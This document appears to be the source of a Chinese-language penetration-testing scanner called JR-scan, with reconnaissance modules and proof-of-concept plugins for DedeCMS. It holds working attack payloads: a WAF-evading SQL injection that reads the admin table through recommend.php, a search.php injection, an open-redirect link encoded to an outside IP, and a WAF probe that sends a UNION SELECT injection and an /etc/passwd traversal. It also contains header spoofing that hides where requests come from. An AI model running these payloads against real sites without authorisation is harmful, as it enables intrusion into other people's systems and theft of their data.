--------------------------------------------------------------------------------
/Information_Scan/plugins/ActiveReconnaissance/check_waf.py:
--------------------------------------------------------------------------------
1 | import re
2 | from Information_Scan.Requests import Requests
3 | from Information_Scan.waf import WAF_RULE
4 |
5 | '''
6 | WAF 检测思路
7 |
8 | 发送Payload触发WAF拦截机制,根据响应头字段或者响应体拦截内容判断WAF
9 | '''
10 |
11 | payload = (
12 | "/index.php?id=1 AND 1=1 UNION ALL SELECT 1,NULL,'',table_name FROM information_schema.tables WHERE 2>1--/**/",
13 | "/../../../etc/passwd", "/.git/", "/phpinfo.php")
14 |
15 |
16 | def verify(headers, content): #检测有无WAF
17 | for i in WAF_RULE:
18 | name, method, position, regex = i.split('|') #提取触发waf的名字 方式 服务 被什么拦截
19 | if method == 'headers':
20 | if headers.get(position) is not None: #CacheFly CDN|headers|BestCDN|CacheFly'
21 | if re.search(regex, str(headers.get(position))) is not None:
22 | return name
23 | else:
24 | if re.search(regex, str(content)): #从源码中匹配
25 | return name
26 |
27 | return 'NoWAF'
28 |
29 | def checkwaf(url): #检测是否存在waf的字符串
30 |
31 | result = 'NoWAF'
32 |
33 | try:
34 | req = Requests() #实例对象
35 | r = req.get(url) #发起请求
36 | result = verify(r.headers, r.text) #正常请求检测有无WAF
37 |
38 | if result == 'NoWAF': #没有waf存在进行payload校验,检测waf
39 | for i in payload:
40 | r = req.get(url + i)
41 | result = verify(r.headers, r.text)
42 | if result != 'NoWAF':
43 | return result
44 | else:
45 | return result
46 | except (UnboundLocalError, AttributeError):
47 | pass
48 | except Exception as e:
49 | pass
50 |
51 | if __name__ == "__main__":
52 | out = checkwaf('http://127.0.0.1','test')
53 | print(out)
54 |
55 |
56 |
--------------------------------------------------------------------------------
/Information_Scan/plugins/ActiveReconnaissance/osdetect.py:
--------------------------------------------------------------------------------
1 | import nmap
2 | import xml
3 | from lib.cli_output import console
4 |
5 | def osdetect(ip): #识别操作系统
6 | nm = nmap.PortScanner() #实例化
7 | try:
8 | result = nm.scan(hosts=ip, arguments='-sS -O -vv -n -T4 -p 80,22,443') #参数设置
9 | for k, v in result.get('scan').items():
10 | if v.get('osmatch'):
11 | for i in v.get('osmatch'):
12 | console('OSdetect', ip, i.get('name') + '\n') #显示
13 | return i.get('name') #返回操作系统名称
14 | else:
15 | break
16 | except Exception as e:
17 | console('OSdetect', ip, 'None\n')
18 |
19 | if __name__ == "__main__":
20 | os = osdetect('127.0.0.1')
21 |
--------------------------------------------------------------------------------
/Information_Scan/plugins/ActiveReconnaissance/robots.py:
--------------------------------------------------------------------------------
1 | import re
2 | from Information_Scan.Requests import Requests
3 |
4 | def robots(url):
5 | result = ''
6 | try:
7 | req = Requests()
8 | r = req.get(url + '/robots.txt')
9 | if r.status_code == 200 and '
)\d+\.\d+\.\d+\.\d+(?= | )', r.text, re.S | re.I)
14 | if result:
15 | for i in result:
16 | if iscdn(i): #是CDN服务器
17 | out.append(i)
18 | except Exception:
19 | pass
20 |
21 | return out
22 |
--------------------------------------------------------------------------------
/Information_Scan/plugins/PassiveReconnaissance/reverse_domain.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import json
3 | import tldextract #tldextract准确地从URL的域名和子域名分离通用顶级域名或国家顶级域名。
4 | import re
5 | from lib.cli_output import console
6 | from Information_Scan.random_header import get_ua
7 |
8 | def reverse_domain(host): # 查询旁站
9 | result = []
10 | data = {"remoteAddress": "{0}".format(host), "key": ""}
11 | header = get_ua() #自定义headers头
12 | try:
13 | r = requests.post('https://domains.yougetsignal.com/domains.php',
14 | headers=header,
15 | data=data,
16 | timeout=5,
17 | verify=False)
18 | text = json.loads(r.text) #返回json格式
19 | domain = tldextract.extract(host) #将URL分割,获得各个域名 http://forums.news.cnn.com/ subdomain='forums.news', domain='cnn', suffix='com'
20 | for i in text.get('domainArray'):
21 | url = i[0]
22 | if url != host: #看看域名是否一致
23 | if tldextract.extract(url).domain == domain.domain: #二级域名比较 top.baidu.com m.baidu.com
24 | result.append(url) #二级域名添加
25 | elif re.search(r'\d+\.\d+\.\d+\.\d+', url):
26 | result.append(url) #IP添加
27 | except:
28 | try:
29 | r = requests.get('http://api.hackertarget.com/reverseiplookup/?q={}'.format(host),
30 | headers=get_ua(), #自定义的headers头
31 | timeout=4,
32 | verify=False)
33 | if '' not in r.text and 'No DNS A records found for' not in r.text: #No DNS A records found for 119.3.60.210 其余情况就是出现了域名
34 | text = r.text
35 | for _ in text.split('\n'):
36 | if _:
37 | result.append(_) #添加域名
38 | else:
39 | result = []
40 | except:
41 | pass
42 | if len(result) < 20:
43 | if result:
44 | for i in result:
45 | console('reverse_domain', host, i + '\n') #旁站进行展示
46 | else:
47 | console('reverse_domain', host, 'None\n')
48 | return result
49 | else:
50 | console('reverse_domain', host, 'The maximum number of domain names exceeded (20)\n')
51 | return ['The maximum number of reverse_domain names exceeded (20)']
52 |
53 |
--------------------------------------------------------------------------------
/Information_Scan/plugins/Scanning/__pycache__/async_scan.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/async_scan.cpython-37.pyc
--------------------------------------------------------------------------------
/Information_Scan/plugins/Scanning/__pycache__/async_scan.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/async_scan.cpython-38.pyc
--------------------------------------------------------------------------------
/Information_Scan/plugins/Scanning/__pycache__/check_target.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/check_target.cpython-37.pyc
--------------------------------------------------------------------------------
/Information_Scan/plugins/Scanning/__pycache__/check_target.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/check_target.cpython-38.pyc
--------------------------------------------------------------------------------
/Information_Scan/plugins/Scanning/__pycache__/port_scan.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/port_scan.cpython-37.pyc
--------------------------------------------------------------------------------
/Information_Scan/plugins/Scanning/__pycache__/port_scan.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/Information_Scan/plugins/Scanning/__pycache__/port_scan.cpython-38.pyc
--------------------------------------------------------------------------------
/Information_Scan/plugins/Scanning/check_target.py:
--------------------------------------------------------------------------------
1 | import hashlib
2 | import random
3 | import sys
4 | import urllib
5 | import requests
6 |
7 | USER_AGENT = "Mozilla/5.0 (Windows; U; MSIE 10.0; Windows NT 9.0; es-ES)"
8 | user_agent = {"user-agent": USER_AGENT}
9 |
10 | class Inspector:
11 | """ 这个类的任务是在运行时检查应用程序的行为
12 |
13 | 目的:请求一个不存在的页面"""
14 | TEST404_OK = 0
15 | TEST404_MD5 = 1
16 | TEST404_STRING = 2
17 | TEST404_URL = 3
18 | TEST404_NONE = 4
19 |
20 | def __init__(self, target):
21 | self.target = target
22 |
23 | def _give_it_a_try(self):
24 | """每次调用此方法时,它都会请求一个随机资源
25 |
26 | 目标域。返回值是一个值为的字典
27 |
28 | HTTP响应代码,resquest大小,md5的内容和内容
29 |
30 | 本身。如果有重定向,它将记录新的url"""
31 |
32 | s = []
33 | for n in range(0, 42):
34 | random.seed()
35 | s.append(chr(random.randrange(97, 122)))
36 | s = "".join(s)
37 |
38 | target = self.target + s
39 |
40 | try:
41 | page = requests.get(target, headers=user_agent, verify=False,timeout=5)
42 | content = page.content
43 | result = {
44 | 'target': urllib.parse.urlparse(target).netloc,
45 | 'code': str(page.status_code),
46 | 'size': len(content),
47 | 'md5': hashlib.md5(content).hexdigest(),
48 | 'content': content,
49 | 'location': None
50 | }
51 | if len(page.history) >= 1:
52 | result['location'] = page.url
53 | return result
54 | except:
55 | result = {
56 | 'target': urllib.parse.urlparse(target).netloc,
57 | 'code': '',
58 | 'size': '',
59 | 'md5': '',
60 | 'content': '',
61 | 'location': None
62 | }
63 | return result
64 |
65 | def check_this(self):
66 | """Get the a request and decide what to do"""
67 | first_result = self._give_it_a_try()
68 |
69 | if first_result['code'] == '404':
70 | return '', Inspector.TEST404_OK
71 |
72 | elif first_result['code'] == '302' or first_result['location']:
73 | location = first_result['location']
74 | return location, Inspector.TEST404_URL
75 | else:
76 | return first_result['md5'], Inspector.TEST404_MD5
77 |
78 | return '', Inspector.TEST404_NONE
79 |
80 | if __name__ == '__main__':
81 | i = Inspector(sys.argv[1])
82 | print(i.check_this())
83 |
--------------------------------------------------------------------------------
/Information_Scan/random_header.py:
--------------------------------------------------------------------------------
1 | import random
2 | import socket
3 | import string
4 | import struct
5 | from fake_useragent import UserAgent
6 |
7 | HEADERS = {
8 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
9 | 'User-Agent': "",
10 | 'Referer': "",
11 | 'X-Forwarded-For': "",
12 | 'X-Real-IP': "",
13 | 'Connection': 'keep-alive',
14 | }
15 |
16 | def get_ua(): #自定义headers头
17 | ua = []
18 | with open(r'Information_Scan/data/path/user-agents.txt', 'r', encoding='utf-8') as f:
19 | for i in f.readlines():
20 | ua.append(i.strip()) # 形成路径 每行进行切换
21 |
22 | key = random.random() * 20 #随机值
23 | referer = ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(int(key))]) #生成随机referer
24 | referer = 'www.' + referer.lower() + '.com'
25 | ip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff))) #转换IPV4地址字符串(192.168.10.8)成为32位打包的二进制格式
26 | #struct.pack 按照给定的格式(fmt),把数据封装成字符串
27 | HEADERS["User-Agent"] = random.choice(ua)
28 | HEADERS["Referer"] = referer
29 | HEADERS["X-Forwarded-For"] = HEADERS["X-Real-IP"] = ip
30 |
31 | return HEADERS
32 |
33 |
34 | if __name__ == "__main__":
35 | print(get_ua())
36 |
37 |
--------------------------------------------------------------------------------
/Information_Scan/url.py:
--------------------------------------------------------------------------------
1 | from urllib import parse
2 | import re
3 | import dns.resolver
4 |
5 |
6 | def parse_host(url): #整理主机头
7 | # 根据url得到主机host 例如 http://www.baidu.com:80 返回 www.baidu.com
8 | if (not parse.urlparse(url).path) and (parse.urlparse(url).path != '/'):
9 | host = url.replace('http://', '').replace('https://', '').rstrip('/')
10 | else:
11 | host = url.replace('http://', '').replace('https://', '').rstrip('/') #删除http https
12 | host = re.sub(r'/\w+', '', host) #删除域名之外的东西
13 | if ':' in host:
14 | host = re.sub(r':\d+', '', host) #删除端口
15 | return host
16 |
17 |
18 | def parse_ip(host): #获得正常的IP,
19 | host = parse_host(host) #获得主机头 www.baidu.com
20 | # 根据domain得到ip 例如www.xxx.com 得到 x.x.x.x
21 | try:
22 | resolver = dns.resolver.Resolver()
23 | resolver.nameservers = ['1.1.1.1', '8.8.8.8']
24 |
25 | a = resolver.query(host, 'A') #查询类型为A记录
26 | for i in a.response.answer: #检测是不是特殊的IP
27 | for j in i.items:
28 | if hasattr(j, 'address'):
29 | if not re.search(r'1\.1\.1\.1|8\.8\.8\.8|127\.0\.0\.1|114\.114\.114\.114|0\.0\.0\.0', j.address):
30 | return j.address
31 | except Exception as e:
32 | pass
33 | return host #返回正常的IP
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Information_Scan/web_info.py:
--------------------------------------------------------------------------------
1 | import chardet #用来检测编码格式
2 | from Information_Scan.plugins.ActiveReconnaissance.osdetect import osdetect
3 | from Information_Scan.url import parse_host, parse_ip
4 | from Information_Scan.plugins.InformationGathering.geoip import geoip
5 | from Information_Scan.Requests import Requests
6 | from lib.cli_output import console
7 | from lib.sqldb import Sqldb
8 | from Information_Scan.plugins.PassiveReconnaissance.wappalyzer import WebPage
9 | from Information_Scan.plugins.ActiveReconnaissance.check_waf import checkwaf
10 |
11 | def subdomain_save(data):
12 | Sqldb('result').get_subdomain(data) #保存到数据库
13 |
14 | def web_info(url,flags=1): #返回H5页面展示信息
15 | host = parse_host(url) #整理地址格式得到host www.baidu.com
16 | ipaddr = parse_ip(host) #获得正常的IP,排除DNS服务器
17 | url = url.strip('/')
18 | address = geoip(ipaddr) #获取IP地理位置
19 | wafresult = checkwaf(url) #检测waf
20 | req = Requests()
21 | try:
22 | r = req.get(url) #返回session的长连接
23 | coding = chardet.detect(r.content).get('encoding') #获取网站编码格式
24 | r.encoding = coding
25 | webinfo = WebPage(r.url, r.text, r.headers).info() #传入url text headers 返回cms信息 网站标题 服务器
26 | except Exception:
27 | webinfo={}
28 |
29 | if webinfo:
30 | console('Webinfo', host, 'Title: {}\n'.format(webinfo.get('title')))
31 | console('Webinfo', host, 'Fingerprint: {}\n'.format(webinfo.get('apps')))
32 | console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server')))
33 | console('Webinfo', host, 'WAF: {}\n'.format(wafresult))
34 | else:
35 | webinfo = {}
36 | wafresult = 'None'
37 | osname = osdetect(host) #操作系统名称
38 |
39 | data = {
40 | host: {
41 | 'WAF': wafresult,
42 | 'Ipaddr': ipaddr,
43 | 'Address': address,
44 | 'Webinfo': webinfo,
45 | 'OS': osname,
46 | }
47 | }
48 |
49 | if flags == 1:
50 | return data, webinfo.get('apps'), webinfo.get('title') #返回目标信息 数据 标题
51 | else:
52 | subdomain_save(data)
53 |
54 | if __name__ == "__main__":
55 | web_info('http://127.0.0.1')
--------------------------------------------------------------------------------
/JR.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import gevent
3 | from gevent import monkey
4 | monkey.patch_all()
5 | from report import gener
6 | from lib.cli_output import banner
7 | from lib.cli_output import usage
8 | from lib.bcolors import Bcolors
9 | from lib.enter import add
10 | from Information_Scan.common import start
11 | from POC_Scan.main import poc_use
12 | from POC_Scan.main import search,show_poc,use
13 | from lib.sqldb import Sqldb
14 | from AWVS_Check.AWVS import awvs
15 |
16 | class JR(object):
17 |
18 | def handle(self): # 进行调度
19 | try:
20 | dbname = 'result'
21 | banner()
22 | print('-' * 43)
23 | usage()
24 | print('-' * 43)
25 | while True:
26 | show = input(Bcolors.RED + '[JR]>> ' + Bcolors.ENDC) # 红色
27 | if show in ['1','Information_Scan']:
28 | target = input(Bcolors.RED + '[JR/Information_Scan/Set_Target]>>' + Bcolors.ENDC)
29 | lives=add(target)
30 | for i in lives:
31 | start(i,dbname)
32 |
33 | elif show in ['2','POC_Scan']:
34 | poc_use()
35 | while True:
36 | command, keywords = input(Bcolors.RED + '[JR/POC_Scan/]>>' + Bcolors.ENDC).split()
37 | if command == 'search' and keywords:
38 | search(keywords)
39 | elif command == "show" and keywords == 'poc':
40 | show_poc()
41 | elif command == 'use' and keywords:
42 | target = input(Bcolors.RED+'[JR/POC_Scan/Set_Target]>>'+Bcolors.ENDC)
43 | lives=add(target)
44 | for live in lives:
45 | for i in use(keywords, live):
46 | Sqldb(dbname).get_vuln(i,keywords)
47 | elif command =='back' and keywords == 'menu':
48 | break
49 | else:
50 | print(Bcolors.WARNING + '[-] 提示: 输入错误...' + Bcolors.ENDC)
51 |
52 | elif show in ['3','AWVS_Check']:
53 | awvs_check=awvs()
54 | awvs_check.usage()
55 | while True:
56 | command= input(Bcolors.RED + '[JR/AWVS_Check/]>>' + Bcolors.ENDC)
57 | if command == 'scan':
58 | awvs_check.scan()
59 | elif command == "stop":
60 | awvs_check.stop()
61 | elif command == 'delete':
62 | awvs_check.delete()
63 | elif command =='view':
64 | awvs_check.view()
65 | elif command =='back':
66 | break
67 | else:
68 | print(Bcolors.WARNING + '[-] 提示: 输入错误...' + Bcolors.ENDC)
69 |
70 | elif show in ['4','H5_Create']:
71 | gener()
72 | elif show in ['5','Help']:
73 | usage()
74 | elif show in ['6','exit']:
75 | break
76 | elif show == '':
77 | pass
78 | else:
79 | print(Bcolors.WARNING + '[-] 提示: 输入错误...' + Bcolors.ENDC)
80 | except KeyboardInterrupt as e:
81 | print(e)
82 |
83 | if __name__ == '__main__':
84 | try:
85 | jr=JR()
86 | jr.handle()
87 | except KeyboardInterrupt:
88 | print('\nCtrl+C Stop running\n')
89 | sys.exit(0)
--------------------------------------------------------------------------------
/POC_Scan/__pycache__/main.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/__pycache__/main.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/__pycache__/main.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/__pycache__/main.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/__pycache__/pocdb.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/__pycache__/pocdb.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/__pycache__/pocdb.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/__pycache__/pocdb.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/__init__.py
--------------------------------------------------------------------------------
/POC_Scan/cms/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/__pycache__/__init__.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/__pycache__/cmsmain.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/__pycache__/cmsmain.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/__pycache__/cmsmain.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/__pycache__/cmsmain.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__init__.py
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/__init__.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/__pycache__/dedecms_download_redirect.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_download_redirect.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/__pycache__/dedecms_download_redirect.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_download_redirect.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/__pycache__/dedecms_error_trace_disclosure.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_error_trace_disclosure.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/__pycache__/dedecms_error_trace_disclosure.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_error_trace_disclosure.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/__pycache__/dedecms_recommend_sqli.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_recommend_sqli.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/__pycache__/dedecms_recommend_sqli.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_recommend_sqli.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/__pycache__/dedecms_search_typeArr_sqli.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_search_typeArr_sqli.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/__pycache__/dedecms_search_typeArr_sqli.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_search_typeArr_sqli.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/__pycache__/dedecms_version.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_version.cpython-37.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/__pycache__/dedecms_version.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/dedecms/__pycache__/dedecms_version.cpython-38.pyc
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/dedecms_download_redirect.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms download.php重定向漏洞
5 | referer: http://skyhome.cn/dedecms/357.html
6 | author: Lucifer
7 | description: 在dedecms 5.7sp1的/plus/download.php中67行存在的代码,即接收参数后未进行域名的判断就进行了跳转。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class dedecms_download_redirect_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/plus/download.php?open=1&link=aHR0cDovLzQ1Ljc2LjE1OC45MS9zc3Jm"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"100e8a82eea1ef8416e585433fd8462e" in req.text:
27 | cprint("[+]存在dedecms download.php重定向漏洞...(低危)\tpayload: "+vulnurl, "blue")
28 | return True
29 | else:
30 | cprint("[-]不存在dedecms_download_redirect漏洞", "white", "on_grey")
31 |
32 | except:
33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = dedecms_download_redirect_BaseVerify(sys.argv[1])
38 | testVuln.run()
39 |
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/dedecms_error_trace_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms trace爆路径漏洞
5 | referer: http://0daysec.blog.51cto.com/9327043/1571372
6 | author: Lucifer
7 | description: 访问mysql_error_trace.inc,mysql trace报错路径泄露。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class dedecms_error_trace_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/data/mysql_error_trace.inc"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"可能不存在漏洞", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = dedecms_error_trace_disclosure_BaseVerify(sys.argv[1])
38 | testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/dedecms_recommend_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms recommend.php SQL注入
5 | referer: http://blog.csdn.net/change518/article/details/20564207
6 | author: Lucifer
7 | description: 1.首先执行到plus/recommand.php,包含了include/common.inc.php
8 | 2.只要提交的URL中不包含cfg_|GLOBALS|_GET|_POST|_COOKIE,即可通过检查,_FILES[type][tmp_name]被带入
9 | 3.在29行处,URL参数中的_FILES[type][tmp_name],$_key为type,$$_key即为$type,从而导致了$type变量的覆盖
10 | 4.回到recommand.php中,注入语句被带入数据库查询
11 | '''
12 | import sys
13 | import requests
14 | import warnings
15 | from termcolor import cprint
16 |
17 | class dedecms_recommend_sqli_BaseVerify:
18 | def __init__(self, url):
19 | self.url = url
20 |
21 | def run(self):
22 | headers = {
23 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
24 | }
25 | payload = "/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27AnD+ChAr(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,md5(1234),5,6,7,8,9%20FrOm%20`%23@__admin`%23"
26 | vulnurl = self.url + payload
27 | try:
28 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
29 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
30 | cprint("[+]存在dedecms recommend.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
31 | return True
32 | else:
33 | cprint("[-]不存在dedecms_recommend_sqli漏洞", "white", "on_grey")
34 |
35 | except:
36 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
37 |
38 | if __name__ == "__main__":
39 | warnings.filterwarnings("ignore")
40 | testVuln = dedecms_recommend_sqli_BaseVerify(sys.argv[1])
41 | testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/dedecms/dedecms_search_typeArr_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: dedecms search.php SQL注入漏洞
5 | referer: http://0daysec.blog.51cto.com/9327043/1571372
6 | author: Lucifer
7 | description: dedecms /plus/search.php typeArr存在SQL注入,由于有的waf会拦截自行构造EXP。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class dedecms_search_typeArr_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/plus/search.php?keyword=test&typeArr[%20uNion%20]=a"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"Error infos" in req.text and r"Error sql" in req.text:
27 | cprint("[+]存在dedecms search.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | return True
29 | else:
30 | cprint("[-]不存在dedecms_search_typeArr_sqli漏洞", "white", "on_grey")
31 |
32 | except:
33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 |
35 | if __name__ == "__main__":
36 | warnings.filterwarnings("ignore")
37 | testVuln = dedecms_search_typeArr_sqli_BaseVerify(sys.argv[1])
38 | testVuln.run()
--------------------------------------------------------------------------------
